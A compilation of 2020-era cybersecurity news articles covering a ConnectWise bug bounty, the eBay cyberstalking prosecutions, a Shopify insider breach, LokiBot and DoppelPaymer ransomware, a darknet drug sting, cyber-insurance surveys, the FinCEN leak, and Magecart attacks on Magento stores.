Bug bounty hunters have been given fresh digital grounds to prowl with the launch of a new vulnerability detection rewards program by ConnectWise.
The software specialist provider announced today that it has launched a bug bounty program to supplement its own internal vulnerability management strategy. The crowdsourcing program was created with the aim of boosting efforts to quickly identify and remediate bugs and security vulnerabilities in the company's software.
To host the program, ConnectWise is partnering with hacker-powered security platform HackerOne. The ConnectWise Bug Bounty program is private, meaning that it is only open to invited hackers via the HackerOne platform.
ConnectWise said that it is committed to addressing all confirmed vulnerabilities that are discovered through the bug bounty program and will remediate and disclose issues "commensurate with severity." Responsible disclosures will continue to be delivered through the ConnectWise Trust Site, which houses the company's security bulletins and alerts, critical patches, and updates, with the ability to subscribe to proactive notifications via an RSS feed.
“Cyber criminals move fast, so we have to move faster," said Tom Greco, director of information security at ConnectWise. "Employing a bug bounty program with the help of HackerOne, the industry leader in this space, will allow us to do just that by finding issues before bad actors get a chance to exploit them.”
Greco said that the world's bug bounty hunters provide an extra layer of protection by seeking out and reporting vulnerabilities.
“Crowdsourcing in this way represents a solid additional layer of security, and we clearly value the community’s expertise and participation in helping us keep our products secure," he commented.
"As we said earlier this year, the launch of this Bug Bounty program is yet another important addition to our security arsenal—and it’s the latest piece of our overall strategy to strengthen our own security standing so that we can better protect our partners and their SMB customers.”
ConnectWise is headquartered in Tampa, Florida, but has offices across the United States and abroad in Australia, India, and the United Kingdom. The company was founded in 1982 and became a Thoma Bravo Portfolio Company on March 1, 2019.
Four former eBay executives accused of cyber-stalking and intimidating a Massachusetts couple are to admit their guilt before a court next month.
The married couple, an editor and a publisher residing in Natick, were targeted with a series of terrifying deliveries after they criticized eBay in an online newsletter.
Horrific parcels sent to the couple included a bloody pig mask, live spiders and cockroaches, a book on surviving the death of a spouse, and a wreath of funeral flowers. In addition, pornographic magazines addressed to the husband were received by one of the couple's neighbors.
The four defendants due to plead guilty in October are among six former senior employees of the American multinational e-commerce corporation who were charged in June with carrying out the terrifying cyber-campaign.
Court documents alleged that one member of eBay's executive team directed the company's former senior director of safety and security, James Baugh, to "take her down," referring to the newsletter's editor.
San Jose, California, resident Baugh, along with eBay’s former director of global resiliency, David Harville, of New York City, are charged with conspiracy to tamper with witnesses and conspiracy to commit cyber-stalking.
Other former eBay employees charged in relation to the alleged cyber-stalking are Stephanie Popp, former senior manager of global intelligence; Stephanie Stockwell, former manager of eBay’s Global Intelligence Center; Brian Gilbert, former senior manager of special operations for eBay’s Global Security Team; and Veronica Zea, a former eBay contractor who worked as an intelligence analyst in the Global Intelligence Center.
It is further alleged that the executives created fake social media accounts from which they sent the couple threatening messages and which they used to post statements about fictitious events happening at the couple's home address.
News of the quartet's intention to admit culpability was shared earlier today on Twitter by the US Attorney's Office in the district of Massachusetts. Precisely which defendants are planning to admit their part in the affair was not specified.
The office's tweet read: "Four former employees of #eBay are scheduled to plead guilty on Oct. 8 at 2pm via zoom in federal court in #Boston. The defendants are charged w/ participating in a cyberstalking campaign that targeted a Massachusetts couple."
The UK’s Ministry of Defence (MOD) department, Defence Digital has added the Oracle Cloud Infrastructure within its MODCLOUD Multi-Hybrid suite of secure services, it has been announced today. The move is designed to help the department meet growing demand for real-time information advantage, as well as manage vast quantities of data in an efficient and compliant way.
The Defence Digital department is “responsible for making sure that effective digital and information technology (D&IT) is put into the hands of the military and business front line”, with its remit including defensive cyber strategy, capability development and policy.
To help facilitate this, it will allow Oracle’s flexible range of technologies to be available to the wider Defence community under a pan-defence Oracle enterprise agreement, and through Oracle’s integrated suite of services under a ‘single-sign on.’ This will give the MOD access to emerging technologies such as digital assistants, data visualization, mobile hub and low code development tools, substantially expanding its technological capabilities.
Sara Sharkey, MOD Defence Digital application services and devops head, commented: “The real opportunity of digital transformation—which includes artificial intelligence, machine learning, IoT, blockchain, and human interfaces—is to embrace data on a scale we’ve never seen before. Selecting Oracle Cloud Infrastructure within our MODCLOUD Multi-Hybrid suite of services offers new technologies that are reshaping how we approach IT and using this information, allowing us to focus on innovation and outcomes for both business and importantly, people.”
Richard Petley, senior vice president and country leader at Oracle UK said: “By adopting Oracle Cloud Infrastructure, the Ministry of Defence will be one step closer to realising its wider transformation strategy.
"The MOD will capitalize on the choice and economic benefits Oracle Cloud Infrastructure can provide, all of which will help meet challenges that lie ahead. It joins a whole host of public sector organisations, such as the Home Office, Western Sussex Family Assist, Lambeth Borough Council, Croydon County Council, The Office for National Statistics and Scottish Water, which are already using Oracle Cloud.”
Canadian e-commerce merchant Shopify has reported that it detected an ongoing insider threat case.
In a statement, Shopify said it had become aware of an incident involving the data of fewer than 200 merchants, and its investigation “determined that two rogue members of our support team were engaged in a scheme to obtain customer transactional records of certain merchants.”
Upon discovery, Shopify immediately terminated the individuals’ access to the Shopify network and referred the incident to law enforcement. “We are currently working with the FBI and other international agencies in their investigation of these criminal acts,” it said. “While we do not have evidence of the data being utilized, we are in the early stages of the investigation and will be updating affected merchants as relevant.”
Shopify said the incident was not caused by a technical vulnerability in the platform, and some stores may have had customer data exposed. “This data includes basic contact information, such as email, name, and address, as well as order details, like products and services purchased. Complete payment card numbers or other sensitive personal or financial information were not part of this incident.”
Shopify said it does not take these events lightly, and “we have zero tolerance for platform abuse and will take action to preserve the confidence of our community and the integrity of our product.”
Speaking to Infosecurity, Lisa Forte, partner at Red Goat Cyber Security LLP, said insiders are notoriously dangerous, and although they are rare, they yield access legitimately granted that external attackers would only dream of.
"Incidents involving insiders are also hugely damaging from a reputational standpoint," Forte said. "Perhaps more so than other attacks. Shopify have acted quickly and apparently transparently so far. It is unclear at this point what the precise motive of these insiders was, but all insider threats fall into one of three categories: fraud, sabotage or theft. Often insiders are not working totally alone, with research evidencing the tendency of colleagues to notice but ignore suspicious behavior."
In August, it was reported that a Tesla employee was apparently approached by an attacker, and offered $1 million to place ransomware internally.
Warren Poschman, senior solutions architect at Comforte AG, called the incident “the perfect example of the risks many organizations face” as while it can be difficult to immediately identify a rogue employee or malicious insider, the damage they can do can be irreversible. “This can create a lot of distress on both the businesses side and on consumers as fraud is easy to commit with stolen or accessed account information,” he said.
Jake Moore, cybersecurity specialist at ESET said: “Insider threats are a constant risk that businesses have always had to take a chance with. However, an increase in remote working – alongside the consequent factor of new employees never physically meeting their employers – accelerates the risks, meaning that insider attacks may become more prevalent than ever.”
The evolution towards being able to operate without passwords is being driven by two factors: BYOD and standards.
Speaking on a Cisco webinar, advisory CISO J. Wolfgang Goerlich said while we have to wait for “robots and flying cars,” he could see a world with reduced reliance on passwords. He said the consumer typically drives the experience that they expect in the workplace, and consumerization has enabled users to become more familiar with the technology they use.
Goerlich also praised standards, in particular from the FIDO Alliance, on “what a good passwordless token looks like.” He said there is a lot of confidence in standards and development in strong factors, is still paired with a password to make it easy for people to get in. “So in a passwordless world, they throw in a username and complete a secondary factor of authentication without having to enter a password, and then they don’t have to remember things or rotate things,” he said.
Citing Cisco statistics, Goerlich said the average user has 191 passwords, “so the ability to move off of those is something we’re very excited about.” He said the “pieces have come together” and CISOs are integrating a passwordless concept with their roadmaps.
Fellow advisory CISO for Cisco EMEA, Richard Archdeacon, agreed CISOs are beginning to look at passwordless as an option, and are looking to see if this can work at an enterprise level. “It achieves two ends: it improves your security; and it makes life easier for people, and if you can make life easier when you’re in a security team, that is a real plus,” he said.
Goerlich also made the point that CISOs often think about how to increase trust in passwordless authentication, and how fraud can be combatted if passwords are disused. He recommended using targeted machine learning to enable logins, as well as zero trust strategies. He said: “I think there is a lot that has to be considered when we talk about the next step, making it scale to the enterprise and really how we secure that passwordless future.”
Wendy Nather, head of advisory CISOs, said what is making this possible is we have more secure enclaves on phones than before, and more trusted processing modules on laptops, “where cryptographic functions can be manipulated securely without any inference from the user or any attacker who might be on the laptop or the device.”
Nather said that using the FIDO standard, a “shared secret” can be created, which is a parent key, and use it to authenticate to the phone using TouchID or FaceID, and the secure enclave would log you in, without the user having to do anything. “From my perspective I wouldn’t have to put in a password, I would just log into my phone with my fingerprint, and then the phone would do the rest. This is one way we are making passwordless a reality.”
Most UK and US workers now view cybersecurity professionals in a positive light, although worryingly few are considering a career in the industry, according to a new study from (ISC)2.
The certifications company polled 2500 workers in the US and UK to compile its 2020 Cybersecurity Perception Study.
It revealed that perceptions of those working in cybersecurity are now generally positive: 71% claimed they view security pros as “smart, technically skilled individuals,” while 51% described them as “good guys fighting cybercrime.”
However, more concerning is the lack of interest in pursuing a career in the industry: 69% of respondents said it’s not the right fit for them, despite admitting that objectively it seems like a good option.
Part of the reasoning behind this is that individuals believe cybersecurity roles require a significant investment of time and money in training and the accrual of technical knowledge.
Some 61% said they thought they’d need more education or a certification before getting a job in the sector, 32% believe it requires too much tech know-how or training, 27% said they don’t know how to code and 26% claimed it is “too intimidating.”
Women were more likely than men to perceive the industry as intimidating and to be put off by the lack of diversity.
These perceptions may have been formed in part because most (77%) respondents were never offered cybersecurity as part of their school or college curriculum. Partly as a result, the majority (68%) said their view of the industry is shaped by portrayals in TV shows and movies (37%) or by news coverage of security incidents (31%).
Frustratingly for those hoping to encourage more people into the industry, the report comes at a time when many are considering a career change. Further, attributes such as job stability (61%), flexible working (57%) and earning potential (56%), all of which are available in security roles, are now priorities for respondents.
Perceptions of cybersecurity matter because, with an estimated global shortfall of over four million professionals, a major recruitment drive is needed to encourage workers to switch career paths.
However, the unpalatable truth is that many of the respondents’ negative perceptions are accurate: employers still often rely too much on certifications and previous experience when selecting candidates, and diversity is a persistent problem.
A particularly acute challenge will be changing perceptions among younger professionals: Generation Z respondents were least likely to view cybersecurity professionals in a positive light.
“The reality of the situation, and what we need to do a better job of publicizing, is that a truly effective cybersecurity workforce requires a broad range of professionals who bring different skillsets to their teams,” argued (ISC)2 COO, Wesley Simpson.
“While technical skills are vital for many roles, we also need individuals with varied backgrounds in areas including communications, risk management, legal, regulatory compliance, process development and more, to bring a well-rounded perspective to cyber-defense.”
The US government has been forced to sound the alarm over anticipated attempts by hostile nations and cyber-criminals to spread disinformation around the results of the 2020 elections.
In a new Public Service Announcement on Tuesday, the FBI and Cybersecurity and Infrastructure Security Agency (CISA) warned that “foreign actors and cyber-criminals” could use several channels to undermine confidence in the democratic process, including new and defaced websites and social media posts.
“State and local officials typically require several days to weeks to certify elections’ final results in order to ensure every legally cast vote is accurately counted. The increased use of mail-in ballots due to COVID-19 protocols could leave officials with incomplete results on election night,” it explained.
“Foreign actors and cyber-criminals could exploit the time required to certify and announce elections’ results by disseminating disinformation that includes reports of voter suppression, cyber-attacks targeting election infrastructure, voter or ballot fraud, and other problems intended to convince the public of the elections’ illegitimacy.”
The alert urged the US public to get their news only from trusted sources of verified information, such as state and local election officials.
The process of counting votes could be dragged out even longer thanks to new policies rolled out by Trump appointee and new head of the Postal Service (USPS) Louis DeJoy, which some reports have claimed are already causing major delivery delays.
Any misinformation campaigns would only have to echo the sentiments of the President himself to undermine faith in the democratic process: Trump has claimed repeatedly without evidence that mail-in voting could lead to widespread voter fraud.
The FBI/CISA urged US voters to: be more critical when reading news about the election results, verify with multiple reliable sources, including state and local government election officials and make use of social media tools designed to flag fake news if they spot anything suspicious.
The US government has warned of a major increase in detections of info-stealing malware LokiBot over the past couple of months.
The Cybersecurity and Infrastructure Security Agency (CISA) sounded the alarm on Tuesday, revealing that its Einstein intrusion detection system had spotted a “notable increase” in the use of the malware since July.
“LokiBot uses a credential- and information-stealing malware, often sent as a malicious attachment and known for being simple, yet effective, making it an attractive tool for a broad range of cyber-actors across a wide variety of data compromise use cases,” it added.
Also known as Loki PWS, the Trojan malware is designed to steal usernames, passwords, cryptocurrency wallets and other credentials through the use of a keylogger. It can also deploy a backdoor, enabling the installation of additional payloads.
Although it is spread most often by malicious email attachment, users could also be targeted via phishing texts and private messages, or by infected websites.
First discovered in 2016, LokiBot has mainly been used to target Windows and Android users, and in the past has even been used as a banking Trojan and mobile ransomware. Most recently, Trend Micro researchers discovered a version disguised as a launcher for popular gaming title Fortnite.
Gurucul CEO, Saryu Nayyar, argued that the CISA warning shows how cyber-criminals are successfully scaling their business model.
“The fact that LokiBot has been around for over four years and has gained in capability over time is a reflection of how much malicious actors have advanced the state of their art, leveraging the same development models we use in the commercial space,” he added.
“Fortunately, our security tools have also improved over time. Using a combination of data sources for telemetry, it's possible to analyze events as they happen and identify malicious user or system behaviors. This lets an organization mitigate these attacks before they can cause serious damage.”
CISA recommended a range of best practice steps to mitigate the threat including: prompt patching; use of up-to-date AV; multi-factor authentication; scanning for malicious email attachments; user monitoring; and employee awareness training.
A global sting operation targeting drug trafficking on the darknet has led to 179 arrests and the seizure of weapons, drugs, and millions of dollars in cash and virtual currencies.
Operation DisrupTor was conducted across the United States and Europe and was a collaborative effort between the law enforcement and judicial authorities of Austria, Cyprus, Germany, the Netherlands, Sweden, Australia, Canada, the United Kingdom, and the United States.
According to a statement released today by Europol, the 179 individuals arrested as part of the operation were vendors who had allegedly engaged in tens of thousands of sales of illicit goods.
The arrests were carried out in the United States (121), Germany (42), the Netherlands (8), United Kingdom (4), Austria (3), and Sweden (1).
Hinting at more arrests to come, Europol said: "A number of investigations are still ongoing to identify the individuals behind dark web accounts."
Law enforcement seized $6.5m, 64 firearms, and 500 kilograms of drugs, including fentanyl, oxycodone, hydrocodone, methamphetamine, heroin, cocaine, ecstasy, MDMA, and medicine containing addictive substances.
"The golden age of [the] dark web marketplace is over," said Europol. "Operations such as these highlight the capability of law enforcement to counter encryption and the anonymity of dark web marketplaces."
The head of Europol’s European Cybercrime Centre (EC3), Edvardas Šileris, said: "Today’s announcement sends a strong message to criminals selling or buying illicit goods on the dark web: the hidden internet is no longer hidden, and your anonymous activity is not anonymous."
Operation DisrupTor builds on the success of last year’s Operation SaboTor and the coordinated law enforcement takedown of the Wall Street Market, one of the largest illegal online markets on the dark web.
"Following the Wall Street Market takedown in May 2019, US and international law enforcement agencies obtained intelligence to identify Darknet drug traffickers," stated the United States Department of Justice. "Darknet vendor accounts were identified and attributed to real individuals selling illicit goods on Darknet market sites such as AlphaBay, Dream, WallStreet, Nightmare, Empire, White House, DeepSea, Dark Market and others."
As a result of operation DisrupTor, federal prosecutions are being conducted in more than 20 federal districts.
Long Island's only tertiary care center and Regional Trauma Center has issued a warning to patients that their personal data may have been exposed as a result of a ransomware attack.
Stony Brook University Hospital has contacted patients by letter to notify them of a possible data breach following an attack on the hospital's third-party vendor Blackbaud in May 2020.
Blackbaud is a communications and fundraising software provider for nonprofits, universities, healthcare organizations, foundations, and other entities worldwide.
Stony Brook was notified by Blackbaud on July 17 that "patient information may have been involved in a security incident on Blackbaud’s systems."
Hospital patients have been warned that data that was on the Blackbaud systems affected by the cyber-attack may have included their name, date of birth, address, contact information, attending doctor, insurance provider, and medical service department.
"Stony Brook did not provide your Social Security number, bank account information or credit card number to Blackbaud, and so these types of information were not in Stony Brook’s files on the potentially affected systems," the hospital told patients in a notification uploaded to its website.
Blackbaud assured the hospital that data stolen in the attack was destroyed and not used, sold, or distributed.
The healthcare provider said: "Based on statements from Blackbaud, we have no reason to believe that the information involved in this incident has been misused."
The 624-bed hospital emphasized that the attack on Blackbaud did not involve access to any Stony Brook systems, including medical systems or electronic health records.
Stony Brook said that it will individually notify "potentially impacted patients for whom it has a valid mailing address." It did not say how it intended to contact patients who did not have a valid mailing address.
Patients have been advised to regularly monitor any statements that they receive from their health plans or healthcare providers and check for any unfamiliar healthcare services.
Stony Brook said: "We are evaluating additional security measures and continue to conduct appropriate oversight of our vendors to help ensure this does not happen in the future."
A cyber-attack that caused a German hospital to refuse treatment to a woman who subsequently died has been linked to a Russian ransomware gang.
Attackers struck Düsseldorf University Clinic (DUC) on the night of Thursday, September 10, gaining access by exploiting a vulnerability in some commercially available Citrix software.
The hospital's IT systems crashed as a result, and patients seeking urgent care were diverted to another hospital 20 miles away in Wuppertal. A woman who had to seek urgent care elsewhere because the digitally besieged DUC was unable to treat her later died.
A spokesman for the responsible public prosecutor's office at the Cybercrime Central and Contact Point (ZAC) said the investigation into the suspected negligent homicide of a patient is ongoing.
First observed in April 2019, DoppelPaymer is a form of ransomware that is believed to have originated from Russia.
"DoppelPaymer is a fork of BitPaymer, and BitPaymer was attributed to Evil Corp, which has been sanctioned by the US and has ties to the Russian Government," said Emsisoft's Brett Callow. "The nature of the relationship between DoppelPaymer and Evil Corp is not clear, but some cooperation has been observed."
DoppelPaymer uses virus-themed email subject lines to attract victims. Like ransomware thugs MAZE, its operators extort money from victims by encrypting and exfiltrating their data and threatening to sell and/or publish sensitive information on the darknet.
News that DoppelPaymer was deployed in this tragic attack was included in a report to the German state parliament's legal committee and announced earlier today by the Ministry of North Rhine-Westphalia.
An investigation into the cyber-incident by German authorities found that hackers smuggled a "loader" into the server at the DUC, possibly months before the next phase of the attack was carried out.
On the night of September 10, the criminals caused encryption software to be downloaded, infecting 30 servers at the DUC.
The hospital's IT systems remain disrupted in the wake of the attack, threatening the safety of other people seeking urgent treatment. Emergency room services are expected to be restored this week.
Collaboration in an enterprise can better enable security going forward, after a challenging six months.
Speaking on a Cisco webinar, Wendy Nather, head of advisory CISOs, said there is need for collaboration over control, as “control presents greater cost for the enterprise.” Asking what you can ask users to take care of on the security side, and what can you no longer enforce, Richard Archdeacon, advisory CISO for Cisco EMEA said there is a chance CISOs are “losing control anyway and will need to become collaborative in order to secure their organizations.”
Fellow advisory CISO J. Wolfgang Goerlich said we have seen the workforce has become more savvy, and this has led to “creative things” in terms of the way the business works with the employees.
Goerlich said the idea of collaboration is sound, and asked how can we introduce constraints, yet still have good relations with the workforce? “Also, how can we leverage this savviness of the workforce that it is developing, and how can we embrace our shadow so to speak?”
Nather said the difference between collaboration and control could have a significant effect on how we build our security products, “not with the assumption that there is a centralized control point that is setting all of the policies and doing all the monitoring and the enforcement, but rather that there are multiple controls, some within the enterprise and some without.”
This has led to the concept of secure remote work, which Nather said when everyone needed to work from home, we saw some big problems in the supply chain and enterprises couldn’t get the laptops they needed for employees to take home and use what they have at home.
“That forced enterprises into BYOD, where they may not have necessarily embraced it before, but now they have no choice,” she said. “As a result of that, the users - especially in Europe - pushed back and are saying ‘this is not a corporate device and I do not want you monitoring it, I do not want any possibility you will erase my data’ and especially when users are at home. Those enterprises that are used to scanning endpoints for vulnerabilities cannot do it any more as the ISPs sitting between user at home and enterprise may see this as an attack.”
Nather said this has resulted into businesses saying to users that they can do what they wish on their own devices, but they need to meet security requirements to access corporate applications. “That is the balance, the collaboration that we are starting to see pushed more and more with remote work,” she said.
Goerlich said in times of stress and when everyone is trying to work remotely, when they go back to “tried and true security” like good MFA, DNS security and a good VPN connection. “One of the trends we’re seeing is in response to the stress, is a doubling down on bread and butter fundamental security controls,” he said.
Archdeacon said there is a trend to get the core fundamentals and controls correct, and now are looking back to ask how this will affect the business in the future. “This comes back to the point of collaboration and control, where we are going to shift the security control to endpoint and user and we’ve got to collaborate with them to be part of our frontline security team when they start to access our resources,” he said.
Nather concluded by saying that the remote work model had to be re-thought quickly, so many organizations had to put in whatever they could at the last minute, and this will impact on users, and ultimately CISOs too. “If they didn’t put in something sustainable at the beginning, they are going to have to now.”
It was also revealed Duo's user authentications per month jumped from 600 million to 800 million per month due to the rush to enable remote work, while over 500 million meeting participants generated 25 billion meeting minutes in April, more than triple the volume in February.
In addition, the report found that 50% of infosecurity professionals believe cyber-warfare will be detrimental to the overall economy during the next 12 months.
Despite this, over a fifth (22%) of CISOs admitted that they do not currently have a strategy in place to defend against this threat. More encouragingly, 51% of CISOs and 48% of infosec professionals acknowledged that they need a strategy to protect against cyber-warfare during the next 12-18 months.
The survey of 6,724 infosecurity professionals also showed that ransomware has risen substantially amid the COVID-19 pandemic in 2020, with 43% reporting seeing an increase in this type of attack. Close to three-quarters (70%) of CISOs/CIOs and 63% of infosec professionals said they expect to see ransomware attacks grow further in the next 12-18 months, while 59% of CISOs/CIOs and 50% of infosec professionals expressed fears that a ransomware attack could potentially wipe out their business in the next 12-18 months if there is no increased investment in security.
In order to gain internal investment to improve defences against these cyber-warfare and ransomware threats, there was agreement amongst 51% of infosec professionals that the way they communicate about security has to change dramatically. In regard to the type of changes needed, 41% of infosec professionals believe more communication with the wider public are required, both within and organization and outside. Additionally, 38% feel there should be better communication with C-suite executives, particularly in helping them appreciate the wider business risks posed by these cyber-attacks.
Liviu Arsene, global cybersecurity researcher at Bitdefender commented: “2020 has been a year of change — not only for the world at large — but for the security industry. The security landscape is rapidly evolving as it tries to adapt to the new normal, from distributed workforces to new threats. Amongst the new threats is cyberwarfare. It’s of great concern to businesses and the economy — and yet not everyone is prepared for it. At the same time, infosec professionals have had to keep up with new threats from an old source, ransomware, that can affect companies' bottom lines if not handled carefully.
“The one thing we know is that the security landscape will continue to evolve. Changes will happen, but we can now make sure they happen for better and not for worse. To succeed in the new security landscape the way we as an industry talk about security has to become more accessible to a wider audience to gain support and investment from within the business. In addition, we have to start thinking about plugging the skills gap in a different way — we have to focus on diversity, and specifically neurodiversity, if we are to stand our ground and ultimately defeat bad actors.”
Cowbell Cyber has announced the launch of a cyber insurance program designed to deliver coverage to address the diversity of incidents under the ‘cyber’ category.
Named Prime 250, Cowbell Cyber said this is intended to deliver “on the need for clarity, simplicity, speed and flexibility” in the space, especially as research has shown that “not understanding coverage” (63%) and “cost” (46%) remain obstacles to the adoption of cyber insurance.
“For years, policyholders have raised concerns about the complexity and opacity of cyber insurance. Meanwhile, cyber-incidents are becoming more frequent and diverse,” said Trent Cooksley, co-founder and COO at Cowbell Cyber. “We have created Prime 250 with the explicit intent to make cyber insurance easy and bring clarity to coverages and policy terms so that every business can benefit from the financial protection delivered by cyber insurance.”
In an email to Infosecurity, Caroline Thompson, head of underwriting at Cowbell Cyber, said the intention was to simplify the application process, so it is now 100% online and only requires the company name and its domain name. She said: ”All quotes issued by Cowbell are bindable; this eliminates any delay. We see businesses in need of a Certificate of Insurance (COI) for contractual reasons. We can deliver policy and COI in minutes. Nobody else can do this in the market.
“There are side cases that might be automatically referred to our underwriting team, this is all online, triggered automatically with all information required to make a timely decision. This is what we call Prime 250, a Cyber Insurance 2.0 solution.”
In particular, Prime 250’s 25 cyber-specific coverages are organized to mirror the way businesses experience cyber-incidents: first party loss, first party expense and liability. Policyholders receive value from day one of their policy, with access to Cowbell Factors for risk rating and industry peer benchmarking, while Cowbell offers recommendations to remediate identified risk exposures.
Thompson said the intention was to close the gap “on immediate issues related to cyber being bundled with other commercial insurance policies such as a Property & Casualty policy or Business Owner Policy as an add-on (endorsement).”
“Most importantly, we are proud to bring transparency to policyholders,” she added. “With Cowbell Factors and Cowbell Insights, users get a view into their cyber-risk exposure and how to improve their security posture as they get a cyber insurance quote so they can understand how the quote and the policy are built. This provides value on day one and every day after.”
Join our panel discussion on cyber insurance, as part of the Online Summit, taking place 12pm EDT/5pm BST. Register here.
Six individuals have been indicted on conspiracy charges after they allegedly bribed Amazon workers to gain an unfair competitive advantage on Amazon Marketplace estimated to be worth $100m.
The alleged co-conspirators are Ephraim Rosenberg, 45, of Brooklyn, New York; Joseph Nilson, 31, and Kristen Leccese, 32, of New York; Hadis Nuhanovic, 30, of Acworth, Georgia; Rohit Kadimisetty, 27, of Northridge, California; and Nishad Kunju, 31, of Hyderabad, India.
They’ve been charged with conspiracy to use a communication facility to commit commercial bribery, conspiracy to access a protected computer without authorization, conspiracy to commit wire fraud and wire fraud.
Acting as consultants to third-party sellers on the marketplace, they are accused of bribing Amazon staff and contractors to the tune of over $100,000.
In return, the employees reinstated products and merchant accounts blocked by Amazon — including items flagged for violating IP laws, products removed after customer complaints and accounts suspended after manipulating product reviews.
The insiders are also alleged to have suspended competitor accounts, shared intelligence on these businesses and provided info on Amazon algorithms which allowed the six to flood competitor items with negative reviews.
The bribed employees are also said to have provided access to “Amazon’s highly confidential standard operating procedures and algorithms,” and circumvented internal controls to increase storage limits in warehouses, allow sales of restricted products and provide inside info on the most successful ad campaigns and profitable product listings.
As well as providing consultancy services to third-party sellers, Nilson, Leccese and Nuhanovic are also said to have operated and sold through their own accounts on Amazon Marketplace. Kunju was initially bribed as a seller-support worker before becoming an external consultant who recruited and bribed former colleagues, it is alleged.
“As the world moves increasingly to online commerce, we must ensure that the marketplace is not corrupted with unfair advantages obtained by bribes and kick‑backs,” said US attorney Brian Moran. “The ultimate victim from this criminal conduct is the buying public who get inferior or even dangerous goods that should have been removed from the marketplace. I commend the investigators and cybersecurity experts who have worked to identify and indict those engaged in these illegal scheme.”
Around half a million Activision account details have been breached, after an apparent credential stuffing attack.
According to a series of user reports on social media, detailed by Dexerto, attackers leaked the user credentials and locked users out of their accounts too.
Activision, whose games include Call of Duty, the Tony Hawk skateboarding series and Crash Bandicoot, do not have two-factor authentication offered on accounts, and users encouraged each other to change passwords. In a statement, Activision said “reports suggesting Activision Call of Duty accounts have been compromised are not accurate.” It recommended players “take precaution to protect their Activision accounts, as well as any online accounts, at all times.”
A support blog featured advice on basic cybersecurity steps, such as using strong passwords and password re-use.
Martin Jartelius, chief security officer at Outpost24 said while this is much lower than the 77 million accounts exposed in the Playstation Network breach of 2011, this is still a substantial breach. “In parts the cleanup will be a large undertaking for Activision, we can only hope backups allow restoring original contact data, resetting access and managing the users who still cannot regain access which should be a smaller group,” he said.
Boris Cipot, senior security engineer at Synopsys, said: “Gaming is not simply entertainment for children, it is a thriving industry with highly sophisticated technology. For example, games now offer highly advanced simulators whereby individuals can embody a soldier, fighter pilot or even a football player. With the support of Virtual Reality technology, these games can become even more realistic.
“Moreover, we are witnessing a rise in E-sports, where tournaments and winners amass large pots of money. As there is a lot of money involved, it is normal for cyber-criminals to target known game brands to access user accounts.“
He suspected that the access is used for financial gain, rather than for account access, as “many accounts have a collection of virtual goods which can be acquired by gamers for real money.” Cipot said cyber-criminals could gain profits just by selling one or many accounts which hold valuable virtual goods. “In gaming, the real money lies in selling virtual goods,” he said.
Dean Ferrando, lead systems engineer (EMEA) at Tripwire, recommended those within the gaming industry to take this opportunity to review their own security controls to ensure they are adequately deployed. “A security team should be able to easily assess how many of what kind of assets are on the network, how securely they are configured, and what the vulnerability posture of those assets are,” he said. “All organizations should use this as a wakeup call to ensure that security is not just a check box for compliance. Organizations like Activision want to provide a safe and secure space for gamers and not a game over experience.”
Less than 13% of small and medium-sized businesses (SMBs) have cyber-insurance, potentially leaving large numbers exposed to the serious financial impact of online attacks, according to GlobalData.
The data analytics and consulting firm claimed in its 2020 UK SME Insurance Survey that the mid-market represents a potentially lucrative one for insurers, given the relatively small number currently covered for cyber-related losses.
GlobalData senior analyst, Daniel Pearce, argued that the need for specialized insurance coverage was even greater as distributed working has expanded the corporate attack surface and created security gaps which attackers are keen to exploit.
“The pandemic has increased businesses’ reliance on technology in order to operate during lockdowns, while social distancing guidelines continue to promote home working. With this growing dependence on technology comes an increase in cyber-risk,” he added.
“Given this, the need for cyber-insurance has arguably never been higher. Traditionally, cyber-insurance has seen greater levels of uptake and interest among mid-market and larger corporations, but the pandemic has accelerated the need for smaller business to purchase cover as well.”
Healthcare has been one of the sectors hardest hit by cyber-attacks, especially ransomware, over recent months. In fact, a German patient died recently after an attack forced her to be transferred to a different hospital, delaying treatment by an hour.
Accordingly, in the health and social work sector, cyber-insurance coverage is almost double the average, at 26%.
The findings chime with a poll of UK businesses by insurer Gallagher earlier this year which found that 82% did not have any specialized coverage for cyber-related incidents. Crucially, nearly half (46%) of respondents from mid-sized firms said they thought that cyber-attacks are “mainly an issue for bigger organizations.”
Yet despite the eye-catching headlines of major security incidents at large multi-nationals that cost millions of dollars to fix, a large number of attacks seek out the lower hanging fruit of smaller businesses.
Ransomware was the number one cause of insurance claims in North America in the first half of 2020, according to Coalition.
Global financial institutions have largely failed over recent years to prevent mass money laundering linked to Russian oligarchs, mobsters and Conservative Party donors, according to a new trove of leaked documents.
Over 2000 suspicious activity reports (SARs) filed with the US government’s Financial Crimes Enforcement Network (FinCEN) between 2000 and 2017 were leaked to various publications, in an apparent whistleblowing effort designed to highlight the scale of criminal activity in this area.
SARs are filed by banks and others when illegal activity such as money laundering is suspected. Although this doesn’t require the lender to stop doing business with their clients, banks need to know who their account holders are and to stop any activity that may break international money laundering laws.
However, the sheer scale of the sums involved seem to highlight a major problem area for global financial institutions: the SARs from this leak relate to around $2 trillion in transactions, but are just a small portion of the total reports filed during the 17-year period.
In fact, part of the challenge for the industry is that the scale of the money laundering challenge is still little understood. Accurate statistics are hard to come by, although the UN estimates it could be worth as much as 5% of global GDP ($7 trillion). In the EU, only an estimated 1% of illegal proceeds are seized by authorities.
Among the shady dealings uncovered in the FinCEN leak are evidence that an ally of Russian President Vladimir Putin had ties to a major Conservative Party donor, while other oligarchs avoided Western sanctions by buying art works in London, according to the BBC. Former Trump campaign manager, Paul Manafort, is also named in a SAR.
HSBC, Barclays Bank, JP Morgan, Standard Chartered and Deutsche Bank were all named as helping to move dirty money around the world.
The UK has been named a “higher risk jurisdiction” by FinCEN because of the large number of firms based in the country (3000+) that are named in the leaks.
The leak itself appears to have come from FinCEN given the SARs were originally issued by multiple different lenders. As such, the incident can be filed along with other major whistleblowing discoveries such as the Panama Papers and the Paradise Papers.
FinCEN reacted angrily to the incident, claiming to have referred it to the Department of Justice and the Treasury’s Office of Inspector General.
“As FinCEN has stated previously, the unauthorized disclosure of SARs is a crime that can impact the national security of the United States, compromise law enforcement investigations, and threaten the safety and security of the institutions and individuals who file such reports,” it said in a brief statement.
Online retailers, particularly those still using the Magento 1 e-commerce platform, need to take action fast to update their security posture, according to Sonassi, which hosts Magento.
Magento 1 officially reached its end-of-life at the end of June and is therefore no longer supported by security patches.
Last week it was revealed that around 2000 e-commerce stores running the Magento 1 software were targeted by Magecart attacks over the previous weekend in the largest recorded campaign of its kind. It is estimated that tens of thousands of customers unwittingly had their payment details stolen as a result of the attacks.
